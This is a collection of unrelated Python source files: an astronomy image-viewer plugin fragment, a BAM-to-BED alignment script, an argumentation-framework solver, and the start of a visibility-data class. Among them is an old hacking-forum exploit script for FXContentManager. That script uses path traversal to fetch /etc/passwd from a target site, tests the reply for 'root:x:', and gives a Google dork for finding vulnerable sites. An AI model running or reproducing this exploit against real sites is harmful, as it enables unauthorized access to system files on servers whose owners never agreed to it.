bbox.x1, bbox.y1, bbox.x2, bbox.y2 = (x-self.dx, y-self.dy,
x+self.dx, y+self.dy)
self.redo()
def pan_to_pick_cb(self):
if not self.pick_qs:
self.fv.showStatus("Please pick an object to set the sky level!")
return
pan_x, pan_y = self.pick_qs.objx, self.pick_qs.objy
# TODO: convert to WCS coords based on user preference
self.fitsimage.set_pan(pan_x, pan_y, coord='data')
return True
def sky_cut(self):
if not self.pick_qs:
self.fv.showStatus("Please pick an object to set the sky level!")
return
loval = self.pick_qs.skylevel
oldlo, hival = self.fitsimage.get_cut_levels()
try:
loval += self.delta_sky
self.fitsimage.cut_levels(loval, hival)
except Exception as e:
self.fv.showStatus("No valid sky level: '%s'" % (loval))
def bright_cut(self):
if not self.pick_qs:
self.fv.showStatus("Please pick an object to set the brightness!")
return
skyval = self.pick_qs.skylevel
hival = self.pick_qs.brightness
loval, oldhi = self.fitsimage.get_cut_levels()
try:
# brightness is measured ABOVE sky level
hival = skyval + hival + self.delta_bright
self.fitsimage.cut_levels(loval, hival)
except Exception as e:
self.fv.showStatus("No valid brightness level: '%s'" % (hival))
def zoomset(self, setting, zoomlevel, fitsimage):
scalefactor = fitsimage.get_scale()
self.logger.debug("scalefactor = %.2f" % (scalefactor))
text = self.fv.scale2text(scalefactor)
self.wdetail.zoom.set_text(text)
def detailxy(self, canvas, button, data_x, data_y):
"""Motion event in the pick fits window. Show the pointing
information under the cursor.
"""
if button == 0:
# TODO: we could track the focus changes to make this check
# more efficient
fitsimage = self.fv.getfocus_fitsimage()
# Don't update global information if our fitsimage isn't focused
if fitsimage != self.fitsimage:
return True
# Add offsets from cutout
data_x = data_x + self.pick_x1
data_y = data_y + self.pick_y1
return self.fv.showxy(self.fitsimage, data_x, data_y)
def cutdetail(self, srcimage, dstimage, x1, y1, x2, y2, redraw=True):
image = srcimage.get_image()
data, x1, y1, x2, y2 = image.cutout_adjust(x1, y1, x2, y2)
dstimage.set_data(data, redraw=redraw)
return (x1, y1, x2, y2, data)
def pan_plot(self, xdelta, ydelta):
x1, x2 = self.w.ax.get_xlim()
y1, y2 = self.w.ax.get_ylim()
self.w.ax.set_xlim(x1+xdelta, x2+xdelta)
self.w.ax.set_ylim(y1+ydelta, y2+ydelta)
self.w.canvas.draw()
def write_pick_log(self, rpt):
if self.pick_log is not None:
self.pick_log.write(rpt)
self.pick_log.flush()
def add_pick_cb(self):
if self.last_rpt is not None:
rpt = (self.rpt_format % self.last_rpt) + '\n'
self.w.report.append_text(rpt)
## if self.pick_log:
## self.fv.nongui_do(self.write_pick_log, rpt)
self.write_pick_log(rpt)
def correct_wcs(self):
# small local function to strip comment and blank lines
def _flt(line):
line = line.strip()
if line.startswith('#'):
return False
if len(line) == 0:
return False
return True
# extract image and reference coords from text widgets
txt1 = self.w.report.get_text()
lines1 = filter(_flt, txt1.split('\n'))
txt2 = self.w.correct.get_text()
lines2 = filter(_flt, txt2.split('\n'))
assert len(lines1) == len(lines2), \
Exception("Number of lines don't match in reports")
img_coords = list(map(lambda l: map(float, l.split(',')[3:5]), lines1))
ref_coords = list(map(lambda l: map(float, l.split(',')[0:2]), lines2))
image = self.fitsimage.get_image()
self.fv.nongui_do(self._calc_match, image, img_coords, ref_coords)
def _calc_match(self, image, img_coords, ref_coords):
# NOTE: this function is run in a non-gui thread!
try:
wcs_m, tup = image.match_wcs(img_coords, ref_coords)
self.fv.gui_do(self.adjust_wcs, image, wcs_m, tup)
except Exception as e:
errmsg = "Error calculating WCS match: %s" % (str(e))
self.fv.gui_do(self.fv.show_error, errmsg)
return
def __str__(self):
return 'pick'
#END
|
sosey/ginga
|
ginga/misc/plugins/Pick.py
|
Python
|
bsd-3-clause
| 54,653
|
[
"Gaussian"
] |
f9a896a489d7fad7c0ff232d7deef33a8583296148cb97097168a079dbc3bdce
|
#!/usr/bin/env python
import argparse
import logging
from sys import stdout
from shutil import rmtree
from tempfile import mkdtemp
from pybedtools import BedTool
import pysam
# avoid ugly python IOError when stdout output is piped into another program
# and then truncated (such as piping to head)
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
tool_description = """
Extract alignment ends from sam file and export to bed format.
The resulting bed file contains the outer coordinates of the alignments. The bed
name field is set to the read id and the score field is set to the edit distance
of the alignment. The crosslinked nucleotide is one nt upstream of the 5'-end of
the bed entries.
This script only reports results for alignments that are properly aligned in FR
("forward-reverse") direction.
By default output is written to stdout.
Input:
* alignments in SAM or BAM format (paired-end sequencing)
Output:
* bed6 file containing outer coordinates (sorted by read id)
Example usage:
- Extract coordinates from file input.bam and write to file output.bed
extract_aln_ends.py input.bam --out output.bed
"""
class DefaultsRawDescriptionHelpFormatter(argparse.ArgumentDefaultsHelpFormatter,
argparse.RawDescriptionHelpFormatter):
# To join the behaviour of RawDescriptionHelpFormatter with that of ArgumentDefaultsHelpFormatter
pass
# parse command line arguments
parser = argparse.ArgumentParser(description=tool_description,
formatter_class=DefaultsRawDescriptionHelpFormatter)
# positional arguments
parser.add_argument(
"infile",
help="Path to alignments in SAM or BAM format.")
# optional arguments
parser.add_argument(
"-o", "--outfile",
help="Write results to this file.")
# misc arguments
parser.add_argument(
"-v", "--verbose",
help="Be verbose.",
action="store_true")
parser.add_argument(
"-d", "--debug",
help="Print lots of debugging information",
action="store_true")
args = parser.parse_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s - %(filename)s - %(levelname)s - %(message)s")
elif args.verbose:
logging.basicConfig(level=logging.INFO, format="%(filename)s - %(levelname)s - %(message)s")
else:
logging.basicConfig(format="%(filename)s - %(levelname)s - %(message)s")
logging.info("Parsed arguments:")
logging.info(" infile: '{}'".format(args.infile))
if args.outfile:
logging.info(" outfile: enabled writing to file")
logging.info(" outfile: '{}'".format(args.outfile))
logging.info("")
# convert to bam for use with pybedtools
try:
# setup temporary directory
tmpdir = mkdtemp()
logging.debug("tmpdir: " + tmpdir)
fn_sorted = tmpdir + "/sorted.bam"
fn_fixedmates = tmpdir + "/fixedmates.bam"
# sort by id
logging.debug("calling samtools sort")
pysam.sort(args.infile, "-n", "-o{}".format(fn_sorted), "-T{}".format(tmpdir))
# fix mate information
# also removes secondary and unmapped reads
logging.debug("calling samtools fixmates")
pysam.fixmate("-r", fn_sorted, fn_fixedmates)
# bedtools bam2bed
alns = BedTool(fn_fixedmates)
alns_bedpe = alns.bam_to_bed(bedpe=True, mate1=True, ed=True)
# determine alignment ends and write to file
with (open(args.outfile, "w") if args.outfile is not None else stdout) as out:
for i in alns_bedpe:
chrom = i.fields[0]
fmstart = i.fields[1]
fmend = i.fields[2]
smstart = i.fields[4]
smend = i.fields[5]
readid = i.fields[6]
score = i.fields[7]
fmstrand = i.fields[8]
if fmstrand == "+":
start = fmstart
end = smend
elif fmstrand == "-":
start = smstart
end = fmend
else:
logging.warning("Skipping {}, strand information is missing: '{}'".format(readid, i))
continue
out.write("\t".join([chrom, start, end, readid, score, fmstrand]) + "\n")
finally:
logging.debug("removed tmpdir: " + tmpdir)
rmtree(tmpdir)
|
dmaticzka/bctools
|
bin/extract_aln_ends.py
|
Python
|
apache-2.0
| 4,215
|
[
"pysam"
] |
1ba23d90eb436032bcb8a9d2aeaf076520e3bab87266b8d2bbb87015d7fcd76a
|
#!/usr/bin/env python
################################################################################
##
## Copyright 2013, 2014 Stefan Ellmauthaler, ellmauthaler@informatik.uni-leipzig.de
## Joerg Puehrer, puehrer@informatik.uni-leipzig.de
## Hannes Strass, strass@informatik.uni-leipzig.de
##
## This file is part of diamond.
##
## diamond is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## diamond is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with diamond. If not, see <http://www.gnu.org/licenses/>.
##
################################################################################
##
## diamond.py
##
import argparse
import configparser as cp
import os
import tempfile
import time
import sys
import subprocess as sp
import lib.tools.formulatree as ft
#import lib.adf2dadf.adf2dadf_adm as adf2dadf_adm
import lib.tools.utils as util
import lib.tools.claspresult as cr
version='2.0.2'
# default variables
encdir = "lib"
installdir = os.path.dirname(os.path.realpath(__file__))
eclipse = "eclipse"
clingo = "clingo"
python = "python"
transform = "asp"
# file extensions of instances that signify something
dung_af_file_extension = ".af"
bipolar_file_extension = ".badf"
formula_file_extension = ".adf"
verb_level = 1
args_cred = []
args_scep = []
# encoding filenames
enc = dict(
tkk = "3KK.lp",
ac2cico = "ac2cico.lp",
adm = "admissible.lp",
afop = "afop.lp",
base = "base.lp",
bipc = "bipcheck.lp",
bop = "bop.lp",
cf = "cf.lp",
cfi = "cfi.lp",
cmp = "complete.lp",
fmodel = "fmodel.lp",
formulatree = os.path.join('tools','formulatree.lp'),
grd = "grounded.lp",
imax = "imax.lp",
ltype = "linktypes.lp",
model = "model.lp",
naiD = "naiD.lp",
op = "op.lp",
opsm = "opsm.lp",
prf = "preferred.lp",
prfD = "prfD.lp",
pref = "pref.lp",
prefpy = "pref.py",
prio_trans = "prio_trans.lp",
repr_change = "repr_change.lp",
rmax = "rmax.lp",
semD = "semD.lp",
show = "show.lp",
show_iccma = "show_iccma.lp",
stb = "stable.lp",
stgD = "stgD.lp",
tb2badf = "theorybase2badf.lp",
transformpl = "transform.pl",
transformpy = "transform.py",
twovalued = "twovalued.lp")
# files to delete
filesToDelete=[]
def getoptval(config,section,option,default):
if config.has_option(section,option):
return config.get(section,option)
else:
return default
def initvars(cfgfile):
global installdir, eclipse, clingo, python, transform
cfgfile = os.path.expandvars(os.path.expanduser(cfgfile))
config = cp.ConfigParser()
if os.path.exists(cfgfile):
config.read_file(open(cfgfile))
installdir = getoptval(config,"Path","installdir",installdir)
eclipse = getoptval(config,"Path","eclipse",eclipse)
clingo = getoptval(config,"Path","clingo",clingo)
python = getoptval(config,"Path","python",python)
transform = getoptval(config,"Preferences","transform",transform)
else: #config file does not exist - create one
config.add_section("Path")
config.set("Path","installdir",installdir)
config.set("Path","eclipse", eclipse)
config.set("Path","clingo", clingo)
config.set("Path","python", python)
config.add_section("Preferences")
config.set("Preferences","transform", transform)
config.write(open(cfgfile,'w'))
# simple dia_printing-function to only produce output appropriate to the chosen verbosity
def dia_print(text,verb=1):
global verb_level
if verb_level >= verb:
print(text)
def onestepsolvercall(encodings,instance,headline,allmodels=True):
global clingo_options,clstdout,clstderr,args_cred,args_scep,filesToDelete,iccma
dia_print("==============================")
dia_print(headline)
decision=True
if args_cred!=None:
dia_print("Checking credulous acceptance of: "+args_cred[0],2)
dia_print("Argument is credulously accepted iff answer is SATISFIABLE",2)
if args_cred[0].startswith('"') and args_cred[0].endswith('"'):
args_cred[0] = (args_cred[0])[1:-1]
tmp_file_content=":- not t("+args_cred[0]+").\n"
tmp_file = tempfile.NamedTemporaryFile(mode='w+t', encoding='utf-8', delete=False)
tmp_file.write(tmp_file_content)
tmp_file.flush()
constraints=[tmp_file.name]
filesToDelete.append(tmp_file.name)
switchbool=False
elif args_scep!=None:
dia_print("Checking sceptical acceptance of: "+args_scep[0],2)
dia_print("Argument is sceptically accepted iff answer is UNSATISFIABLE",2)
if args_scep[0].startswith('"') and args_scep[0].endswith('"'):
args_scep[0] = (args_scep[0])[1:-1]
tmp_file_content=":- t("+args_scep[0]+").\n"
tmp_file = tempfile.NamedTemporaryFile(mode='w+t', encoding='utf-8', delete=False)
tmp_file.write(tmp_file_content)
tmp_file.flush()
constraints = [tmp_file.name]
filesToDelete.append(tmp_file.name)
switchbool=True
elif (args_scep==None and args_cred==None):
constraints = []
decision = False
sys.stdout.flush()
if not allmodels and '0' in clingo_options:
clingo_options.remove('0')
#clingo_options= ['0']
#clstderr=None
#clstderr=sp.DEVNULL
if iccma:
with sp.Popen([clingo]+encodings+[enc['show']]+[instance]+constraints+clingo_options,stderr=clstderr,stdout=clstdout,shell=False) as p:
outstring = p.communicate()[0].decode('UTF-8')
res = cr.ClaspResult(outstring)
if (not decision) and (not res.sat):
dia_print('NO',0)
elif decision:
if res.sat!=switchbool: # a very bad hack to invert the answer of the ASP solver only in some cases (i.e. sceptical reasoning)
dia_print('YES',0)
else:
dia_print('NO',0)
else:
if '0' in clingo_options:
dia_print(res.getEnumICCMAoutput(),0)
else:
dia_print(res.getOneICCMAoutput(),0)
else:
with sp.Popen([clingo]+encodings+[enc['show']]+[instance]+constraints+clingo_options,stderr=clstderr,stdout=clstdout,shell=False) as p:
None
if not allmodels:
clingo_options.append('0')
def twostepsolvercall(encodings1,encodings2,instance,headline):
global clingo_options,clstderr
dia_print("==============================")
dia_print(headline)
sys.stdout.flush()
#clingo_options= ['0']
#clstderr=sp.DEVNULL
clingo1 = sp.Popen([clingo]+encodings1+[enc['show']]+[instance]+['--outf=2']+['0'], shell=False, stdout=sp.PIPE, stderr=clstderr)
python2 = sp.Popen([python]+[enc['prefpy']],shell=False, stdin=clingo1.stdout, stdout=sp.PIPE)
clingo1.stdout.close()
clingo2 = sp.Popen([clingo]+encodings2+[enc['show']]+['-']+clingo_options, shell=False, stdin=python2.stdout, stderr=clstderr)
python2.stdout.close()
dia_print(clingo2.communicate()[0])
def indicates_dung_af(instance):
global dung_af_file_extension
return instance.endswith(dung_af_file_extension)
def indicates_bipolarity(instance):
global bipolar_file_extension
return instance.endswith(bipolar_file_extension)
def indicates_formula_representation(instance):
global formula_file_extension
return instance.endswith(formula_file_extension)
def main():
global clingo_options,clstdout,clstderr,verb_level,args_cred,args_scep,iccma
parser= argparse.ArgumentParser(description='Program to compute different interpretations for a given ADF', prog='DIAMOND')
parser.add_argument('instance', metavar='INSTANCE', help='Filename of the ADF instance', default='instance.dl')
parser.add_argument('-cfi', '--conflict-free', help='compute the conflict-free interpretations', action='store_true', dest='conflict_free')
parser.add_argument('-nai', '--naive', help='compute the naive interpretations', action='store_true', dest='naive')
parser.add_argument('-naiD', '--naive-disjunctive', help='compute the naive interpretations (via a disjunctive encoding)', action='store_true', dest='naive_disjunctive')
parser.add_argument('-stg', '--stage', help='compute the stage interpretations', action='store_true', dest='stage')
parser.add_argument('-stgD', '--stage-disjunctive', help='compute the stage interpretations (via a disjunctive encoding)', action='store_true', dest='stage_disjunctive')
parser.add_argument('-sem', '--semi-model', help='compute the semi-model interpretations', action='store_true', dest='semimodel')
parser.add_argument('-semD', '--semi-model-disjunctive', help='compute the semi-model interpretations (via a disjunctive encoding)', action='store_true', dest='semimodel_disjunctive')
parser.add_argument('-mod', '--model', help='compute the two-valued models', action='store_true', dest='model')
parser.add_argument('-stm', '--stablemodel', help='compute the stable models', action='store_true', dest='smodel')
parser.add_argument('-grd', '--grounded', help='compute the grounded interpretation', action='store_true', dest='grounded')
parser.add_argument('-com', '--complete', help='compute the complete interpretations', action='store_true', dest='complete')
parser.add_argument('-adm', '--admissible', help='compute the admissible interpretations', action='store_true', dest='admissible')
parser.add_argument('-prf', '--preferred', help='compute the preferred interpretations', action='store_true', dest='preferred')
parser.add_argument('-prfD', '--preferred-disjunctive', help='compute the preferred interpretations (via a disjunctive encoding)', action='store_true', dest='preferred_disjunctive')
parser.add_argument('-enum', '--enum', help='enumerate all models', action='store_true', dest='enumeration')
parser.add_argument('-all', '--all', help='compute interpretations for all semantics', action='store_true', dest='all')
parser.add_argument('-t', '--transform', help='print the transformed adf to stdout', action='store_true', dest='print_transform')
parser.add_argument('-bc', '--bipolarity-check', help='Check whether a given instance is bipolar or not (implies -pf)',action='store_true',dest='bipolarity_check')
parser.add_argument('-clt', '--compute-link-types', help='compute the link types (implies instance is bipolar)', action='store_true', dest='compute_link_type')
#parser.add_argument('-dadm', '--transform_2_dsadf_adm', help='transforms a propositional formula adf into propositional formula dung style adf (admissible)', action='store_true', dest='adf2dadf_adm')
reasoning_mode = parser.add_mutually_exclusive_group()
reasoning_mode.add_argument('-cred', metavar='ARGUMENT', help='Check credulous acceptance of ARGUMENT', nargs=1, type=str)
reasoning_mode.add_argument('-scep', metavar='ARGUMENT', help='Check sceptical acceptance of ARGUMENT', nargs=1, type=str)
group = parser.add_mutually_exclusive_group()
group.add_argument('-af','--argumentation-framework', help='input is a Dung argumentation framework in ASPARTIX syntax with arg/1 and att/2', action='store_true', dest='af_input')
group.add_argument('-b','--bipolar', help='acceptance functions are given as propositional formulas, attacking and supporting links are specified (implies -pf)', action='store_true', dest='bipolar_input')
group.add_argument('-pf','--propositional-formulas', help='acceptance functions are given as propositional formulas', action='store_true', dest='transformpform')
#group.add_argument('-pf','--propositional-formulas-eclipse', help='acceptance functions are given as propositional formulas (translation using ECLiPSe Prolog)', action='store_true', dest='transformpformec')
group.add_argument('-fr','--functional-representation', help='acceptance functions are given in extensional form', action='store_true', dest='extensionalform')
group.add_argument('-pr','--priorities', help='acceptance functions are given as preferences among statements', action='store_true', dest='transformprio')
group.add_argument('-tb','--theory-base', help='input is a theory base consisting of strict and defeasible rules (implies -b)', action='store_true', dest='theory_base_input')
parser.add_argument('-c', help='specify a config-file', action='store', dest='cfgfile', default='~/.diamond')
parser.add_argument('--version', help='prints the current version', action='version', version='%(prog)s '+ version)
parser.add_argument('-v','--verbose', choices=['0','1','2','json','debug','iccma'], dest='verbosity', default='1', help='Control the verbosity of DIAMOND')
args=parser.parse_args()
args_cred=args.cred
args_scep=args.scep
tmp=tempfile.NamedTemporaryFile(delete=True)
instance=os.path.abspath(args.instance)
initvars(args.cfgfile)
for el in iter(enc):
enc[el] = os.path.join(installdir,encdir,enc[el])
# compute some handy Booleans which are needed later
af = (indicates_dung_af(args.instance) or args.af_input)
bipolar = (indicates_bipolarity(args.instance) or args.bipolar_input)
model_only = args.model and not args.conflict_free and not args.naive and not args.stage and not args.semimodel and not args.naive_disjunctive and not args.stage_disjunctive and not args.semimodel_disjunctive and not args.smodel and not args.grounded and not args.complete and not args.admissible and not args.preferred and not args.preferred_disjunctive and not args.all and not args.print_transform
do_transformation = args.conflict_free or args.naive or args.stage or args.semimodel or args.naive_disjunctive or args.stage_disjunctive or args.semimodel_disjunctive or args.smodel or args.grounded or args.complete or args.admissible or args.preferred or args.preferred_disjunctive or args.all or args.print_transform
transform_to_functions = ((indicates_formula_representation(args.instance) or args.transformpform) and not bipolar)
# assign the correct encodings of the semantics
model_encoding=[enc['base'],enc['cf'],enc['model']]
operators=[enc['ac2cico'],enc['base'],enc['op']]
# check if we get theory base input and add the translation to encodings
if args.theory_base_input:
model_encoding=[enc['fmodel'],enc['tb2badf']]
operators=[enc['bop'],enc['tb2badf']]
# check if we are dealing with an af and choose the respective operator if so
if af:
model_encoding=[enc['afop'],enc['cmp'],enc['twovalued']]
operators=[enc['afop']]
# check if the model semantics is the only thing we should compute for a formula ADF and use a special encoding
if model_only and (indicates_formula_representation(args.instance) or bipolar):
model_encoding=[enc['fmodel']]
# otherwise, the choice of operator depends on bipolarity of the instance
if bipolar:
operators=[enc['bop']]
# if the information is insufficient, complain terribly
if ((not bipolar) and (not transform_to_functions) and (not af) and (not args.theory_base_input)):
dia_print("No input format specified or indicated! Assuming extensional representation of acceptance functions.")
# set clingo options
clingo_options = ['0']
if not args.enumeration:
clingo_options.remove('0')
clstderr = sp.DEVNULL
clstdout = None
iccma = False
if args.verbosity == '0':
clingo_options.append('--verbose=0')
verb_level = 0
elif args.verbosity == '1':
clingo_options.append('--stats=0')
verb_level = 1
elif args.verbosity == '2':
clingo_options.append('--verbose=2')
verb_level = 2
elif args.verbosity == 'json':
clingo_options.append('--outf=2')
verb_level = 0
elif args.verbosity == 'debug':
clstderr = None
verb_level = 2
elif args.verbosity == 'iccma':
verb_level = 0
iccma = True
clstdout = sp.PIPE
clingo_options.append('--outf=2')
clingo_options.append('--project')
# if args.adf2dadf_adm:
# dia_print("==============================")
# dia_print("transforming adf 2 dadf ...")
# with sp.Popen(clingo + " " + enc['formulatree'] + " " + instance + " 0 --outf=2", shell=True, stdout=sp.PIPE) as p:
# out =''
# for byteLine in p.stdout:
# out = out + byteLine.decode(sys.stdout.encoding).strip()
# dia_print(util.formtree2aspinput(adf2dadf_adm.transform(ft.formulatree(out))))
if args.bipolarity_check:
onestepsolvercall([enc['bipc']],instance,"bipolarity check:",False)
if args.compute_link_type:
dia_print("==============================")
dia_print("compute link-types:")
clingo_options.append('--enum-mode=brave')
sys.stdout.flush()
with sp.Popen([clingo,enc['ltype'],instance]+clingo_options,stderr=clstderr,shell=False) as p:
None
clingo_options.remove('--enum-mode=brave')
# if (transform_to_functions and do_transformation and transform=="asp"):
# tmp2=tempfile.NamedTemporaryFile(mode='w+t', encoding='utf-8', delete=False)
# instance = tmp2.name
# dia_print("==============================")
# dia_print("transforming pForm ADF using ASP...")
# sys.stdout.flush()
# with sp.Popen([clingo]+[enc['repr_change']]+[os.path.abspath(args.instance)]+['0'], shell=False,stdout=sp.PIPE,stderr=None) as p:
# sto = p.stdout
# i=1
# for byteLine in sto:
# line = byteLine.decode(sys.stdout.encoding).strip()
# if "ci(" in line or "co(" in line:
# tmp2.write(line.replace("constant", str(i)).replace(") l(","). l(").replace(") s(","). s(").replace(") co(","). co(").replace(") ci(","). ci(")+".\n")
# i+=1
# tmp2.close()
# filesToDelete.append(instance)
if (transform_to_functions and do_transformation and transform=="eclipse"):
tmp2=tempfile.NamedTemporaryFile(delete=False)
instance = tmp2.name
filesToDelete.append(instance)
dia_print("==============================")
dia_print("transforming pForm ADF using Eclipse...")
sys.stdout.flush()
start = time.time()
with sp.Popen([eclipse,"-f",enc['transformpl'],"-e", "main", "--", os.path.abspath(args.instance),instance],stderr=None,shell=False) as p:
None
elapsed = (time.time() - start)
elapsedstring = "%.3f" % (elapsed,)
dia_print("transformation took " + elapsedstring + " seconds")
if args.transformprio and do_transformation:
tmp2 = tempfile.NamedTemporaryFile(delete=False)
instance = tmp2.name
dia_print("==============================")
dia_print("transforming prioritized ADF...")
sys.stdout.flush()
start = time.time()
wd = os.getcwd()
os.chdir(installdir + "/" + encdir)
os.system("python " + enc['transformpy'] + os.path.abspath(args.instance) + " > " + instance)
os.chdir(wd)
elapsed = (time.time() - start)
elapsedstring = "%.3f" % (elapsed,)
dia_print("transformation took " + elapsedstring + " seconds")
filesToDelete.append(instance)
if args.print_transform:
os.system("cat " + instance)
if args.model or args.all:
onestepsolvercall(model_encoding,instance,"two-valued models")
if args.smodel or args.all: # note that stable models are not yet working for the functional representation
onestepsolvercall([enc['base'],enc['cf'],enc['model'],enc['opsm'],enc['tkk'],enc['stb']],instance,"stable models:")
if args.conflict_free or args.all:
onestepsolvercall(operators+[enc['cfi']],instance,"conflict-free interpretations:")
if args.admissible or args.all:
onestepsolvercall(operators+[enc['adm']],instance,"admissible interpretations:")
if args.complete or args.all:
onestepsolvercall(operators+[enc['cmp']],instance,"complete interpretations:")
if args.grounded or args.all:
onestepsolvercall(operators+[enc['tkk'],enc['grd']],instance,"grounded interpretation:")
if args.naive_disjunctive or args.all:
onestepsolvercall(operators+[enc['naiD']],instance,"naive interpretations:")
if args.preferred_disjunctive or args.all:
onestepsolvercall(operators+[enc['prfD']],instance,"preferred interpretations:")
if args.stage_disjunctive or args.all:
onestepsolvercall(operators+[enc['stgD']],instance,"stage interpretations:")
if args.semimodel_disjunctive or args.all:
onestepsolvercall(operators+[enc['semD']],instance,"semi-model interpretations:")
if args.preferred or args.all:
twostepsolvercall(operators+[enc['cmp']],[enc['imax']],instance,"preferred interpretations:")
if args.naive or args.all:
twostepsolvercall(operators+[enc['cfi']],[enc['imax']],instance,"naive interpretations:")
if args.stage or args.all:
twostepsolvercall(operators+[enc['cfi']],[enc['rmax']],instance,"stage interpretations:")
if args.semimodel or args.all:
twostepsolvercall(operators+[enc['cmp']],[enc['rmax']],instance,"semi-model interpretations:")
for fileToDelete in filesToDelete:
os.remove(fileToDelete)
if __name__ == "__main__":
main()
|
tillmo/diamond-adf-code
|
diamond.py
|
Python
|
gpl-3.0
| 21,997
|
[
"ADF"
] |
e328687a77dfdeea1a5d45f57b138137fed20fb484abc7ca80b3b97b966a4ac9
|
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
################################################################
#
# LFI bug found by marcoj (www.x0rg.net) and r0ot (www.x0rg.net)
#
# Sql injection on www.reversedelta.co.uk and CMS name found by me :)
#
import sys, os, time, urllib2, re
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearint = 'cls'
os.system(clearing)
if len(sys.argv) !=2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI FXContentManager |"
print "| Example: fxcms.py http://www.site.com/ |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site + "/"
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI FXContentManager |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] CMS --> FXContentManager"
print "\n[+] Google dork : inurl:/fxmodules/"
print "\n[+] Lets search for lfi bug :)"
print "\n[+] Target:",site
print "\n[+] Check if vulnerable ..."
print
try:
target = urllib2.urlopen(site+"fxmodules/page.php?page=../../../../etc/passwd").read()
if re.findall("root:x:", target):
print "[!] Site is vulnerable "
print
print "*"*95
print "\t"+site+"fxmodules/page.php?page=../../../../etc/passwd"
print "*"*95
print
else:
print "\t[-] Sorry, this site is not vulnerable"
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise
print "\n[-] %s" % time.strftime("%X")
|
knightmare2600/d4rkc0de
|
exploits/090115.py
|
Python
|
gpl-2.0
| 3,500
|
[
"VisIt"
] |
117306340f002f39fa5160590b352d30a6d4be28d9ccc83dc67e17c38086a48a
|
__all__ = ['Visdata','SersicSource','GaussSource','PointSource','SIELens','ExternalShear',
'read_visdata','concatvis','bin_visibilities']
import numpy as np
import os
import astropy.constants as co
import warnings
from .utils import cart2pol,pol2cart
c = co.c.value # speed of light, in m/s
G = co.G.value # gravitational constant in SI units
Msun = co.M_sun.value # solar mass, in kg
Mpc = 1e6*co.pc.value # 1 Mpc, in m
arcsec2rad = (np.pi/(180.*3600.))
rad2arcsec =3600.*180./np.pi
deg2rad = np.pi/180.
class Visdata(object):
"""
Class to hold all necessary info relating to one set of visibilities.
Auto-updates amp&phase or real&imag if those values are changed, but
MUST SET WITH, eg, visobj.amp = (a numpy array of the new values);
CANNOT USE, eg, visobj.amp[0] = newval, AS THIS DOES NOT CALL THE
SETTER FUNCTIONS.
Parameters:
u numpy ndarray
The Fourier plane u coordinates of the visibilities to follow.
v numpy ndarray
The Fourier plane v coordinates of the visibilities to follow.
real numpy ndarray
The real parts of the visibilities
imag numpy ndarray
The imaginary parts of the visibilities
ant1 numpy ndarray
The first antenna number or name of the visibility on each baseline
ant2 numpy ndarray
The second antenna number or name of the visibility on each baseline
PBfwhm float
The FWHM of the antenna primary beam at this wavelength (at present
assumes a homogeneous antenna array)
filename str
A filename associated with these data.
"""
def __init__(self,u,v,real,imag,sigma,ant1=None,ant2=None,PBfwhm=None,filename=None):
self.u = u
self.v = v
self.real = real
self.imag = imag
self.sigma = sigma
self.ant1 = ant1
self.ant2 = ant2
self.PBfwhm = PBfwhm
self.filename = filename
@property
def uvdist(self):
return np.sqrt(self.u**2. + self.v**2.)
@property
def real(self):
return self._real
@real.setter
def real(self,val):
self._real = val
# Setting amp & phase during __init__ will fail since imag is still unknown
# Doing so during conjugate() will also fail, but gives a ValueError
try:
self._amp = np.sqrt(self._real**2. + self.imag**2.)
self._phase = np.arctan2(self.imag,self._real)
except (AttributeError,ValueError):
self._amp = None
self._phase = None
@property
def imag(self):
return self._imag
@imag.setter
def imag(self,val):
self._imag = val
try:
self._amp = np.sqrt(self.real**2. + self._imag**2.)
self._phase = np.arctan2(self._imag,self.real)
except (AttributeError,ValueError):
self._amp = None
self._phase = None
@property
def amp(self):
return self._amp
@amp.setter
def amp(self,val):
self._amp = val
self._real = val * np.cos(self.phase)
self._imag = val * np.sin(self.phase)
@property
def phase(self):
return self._phase
@phase.setter
def phase(self,val):
self._phase = val
self._real = self.amp * np.cos(val)
self._imag = self.amp * np.sin(val)
def __add__(self,other):
return Visdata(self.u,self.v,self.real+other.real,self.imag+other.imag,\
(self.sigma**-2. + other.sigma**-2.)**-0.5)
def __sub__(self,other):
return Visdata(self.u,self.v,self.real-other.real,self.imag-other.imag,\
(self.sigma**-2. + other.sigma**-2.)**-0.5)
def conjugate(self):
u = np.concatenate((self.u,-self.u))
v = np.concatenate((self.v,-self.v))
